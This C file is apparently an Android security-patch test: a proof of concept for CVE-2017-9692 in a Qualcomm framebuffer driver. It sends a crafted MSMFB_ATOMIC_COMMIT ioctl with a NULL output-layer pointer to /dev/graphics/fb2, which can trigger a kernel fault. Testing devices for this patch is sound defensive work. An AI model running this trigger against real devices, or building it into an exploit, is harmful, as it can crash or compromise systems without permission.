securityPatch/CVE-2017-9692/poc.c

/**
 * Copyright (C) 2017 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#define GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <linux/types.h>
#include <pthread.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef _IOC_NONE
#define _IOC_NONE 0U
#endif

#ifndef _IOC_WRITE
#define _IOC_WRITE 1U
#endif

#ifndef _IOC_READ
#define _IOC_READ 2U
#endif

#define _IOC_NRBITS 8
#define _IOC_TYPEBITS 8

#ifndef _IOC_SIZEBITS
#define _IOC_SIZEBITS 14
#endif

#ifndef _IOC_DIRBITS
#define _IOC_DIRBITS 2
#endif

#define _IOC_NRMASK ((1 << _IOC_NRBITS) - 1)
#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS) - 1)
#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS) - 1)
#define _IOC_DIRMASK ((1 << _IOC_DIRBITS) - 1)

#define _IOC_NRSHIFT 0
#define _IOC_TYPESHIFT (_IOC_NRSHIFT + _IOC_NRBITS)
#define _IOC_SIZESHIFT (_IOC_TYPESHIFT + _IOC_TYPEBITS)
#define _IOC_DIRSHIFT (_IOC_SIZESHIFT + _IOC_SIZEBITS)

#define _IOC(dir, type, nr, size)                          \
  (((dir) << _IOC_DIRSHIFT) | ((type) << _IOC_TYPESHIFT) | \
   ((nr) << _IOC_NRSHIFT) | ((size) << _IOC_SIZESHIFT))

#ifndef __KERNEL__
#define _IOC_TYPECHECK(t) (sizeof(t))
#endif

#define _IO(type, nr) _IOC(_IOC_NONE, (type), (nr), 0)
#define _IOR(type, nr, size) \
  _IOC(_IOC_READ, (type), (nr), (_IOC_TYPECHECK(size)))
#define _IOW(type, nr, size) \
  _IOC(_IOC_WRITE, (type), (nr), (_IOC_TYPECHECK(size)))
#define _IOWR(type, nr, size) \
  _IOC(_IOC_READ | _IOC_WRITE, (type), (nr), (_IOC_TYPECHECK(size)))
#define _IOR_BAD(type, nr, size) _IOC(_IOC_READ, (type), (nr), sizeof(size))
#define _IOW_BAD(type, nr, size) _IOC(_IOC_WRITE, (type), (nr), sizeof(size))
#define _IOWR_BAD(type, nr, size) \
  _IOC(_IOC_READ | _IOC_WRITE, (type), (nr), sizeof(size))

#define MDP_IOCTL_MAGIC 'S'
#define MSMFB_ATOMIC_COMMIT _IOWR(MDP_IOCTL_MAGIC, 128, void *)

#define MDP_COMMIT_VERSION_1_0 0x00010000
#define MDP_VALIDATE_LAYER 0x01

#ifdef __LP64
#define MDP_LAYER_COMMIT_V1_PAD 3
#else
#define MDP_LAYER_COMMIT_V1_PAD 4
#endif

#define MAX_PLANES 4

struct mult_factor {
  uint32_t numer;
  uint32_t denom;
};

enum mdp_color_space {
  MDP_CSC_ITU_R_601,
  MDP_CSC_ITU_R_601_FR,
  MDP_CSC_ITU_R_709,
};

enum mdss_mdp_blend_op {
  BLEND_OP_NOT_DEFINED = 0,
  BLEND_OP_OPAQUE,
  BLEND_OP_PREMULTIPLIED,
  BLEND_OP_COVERAGE,
  BLEND_OP_MAX,
};

struct mdp_rect {
  uint32_t x;
  uint32_t y;
  uint32_t w;
  uint32_t h;
};

struct mdp_layer_plane {
  int fd;
  uint32_t offset;
  uint32_t stride;
};

struct mdp_layer_commit_v1 {
  uint32_t flags;
  int release_fence;
  struct mdp_rect left_roi;
  struct mdp_rect right_roi;
  struct mdp_input_layer __user *input_layers;
  uint32_t input_layer_cnt;
  struct mdp_output_layer __user *output_layer;
  int retire_fence;
  void __user *dest_scaler;
  uint32_t dest_scaler_cnt;
  uint32_t reserved[MDP_LAYER_COMMIT_V1_PAD];
};

struct mdp_layer_commit {
  uint32_t version;
  union {
    struct mdp_layer_commit_v1 commit_v1;
  };
};

struct mdp_layer_buffer {
  uint32_t width;
  uint32_t height;
  uint32_t format;
  struct mdp_layer_plane planes[MAX_PLANES];
  uint32_t plane_count;
  struct mult_factor comp_ratio;
  int fence;
  uint32_t reserved;
};

struct mdp_output_layer {
  uint32_t flags;
  uint32_t writeback_ndx;
  struct mdp_layer_buffer buffer;
  enum mdp_color_space color_space;
  uint32_t reserved[5];
};

struct mdp_input_layer {
  uint32_t flags;
  uint32_t pipe_ndx;
  uint8_t horz_deci;
  uint8_t vert_deci;
  uint8_t alpha;
  uint16_t z_order;
  uint32_t transp_mask;
  uint32_t bg_color;
  enum mdss_mdp_blend_op blend_op;
  enum mdp_color_space color_space;
  struct mdp_rect src_rect;
  struct mdp_rect dst_rect;
  void __user *scale;
  struct mdp_layer_buffer buffer;
  void __user *pp_info;
  int error_code;
  uint32_t reserved[6];
};

int main() {
  int fd;
  struct mdp_layer_commit commit;
  struct mdp_output_layer output_layer;

  fd = open("/dev/graphics/fb2", O_RDWR, 0);
  if (fd < 0) {
    return -1;
  }

  memset(&commit, 0, sizeof(struct mdp_layer_commit));
  commit.version = MDP_COMMIT_VERSION_1_0;

  memset(&output_layer, 0, sizeof(output_layer));
  commit.commit_v1.output_layer = (struct mdp_output_layer *)NULL;
  commit.commit_v1.flags |= MDP_VALIDATE_LAYER;
  ioctl(fd, MSMFB_ATOMIC_COMMIT, &commit);

  return 0;
}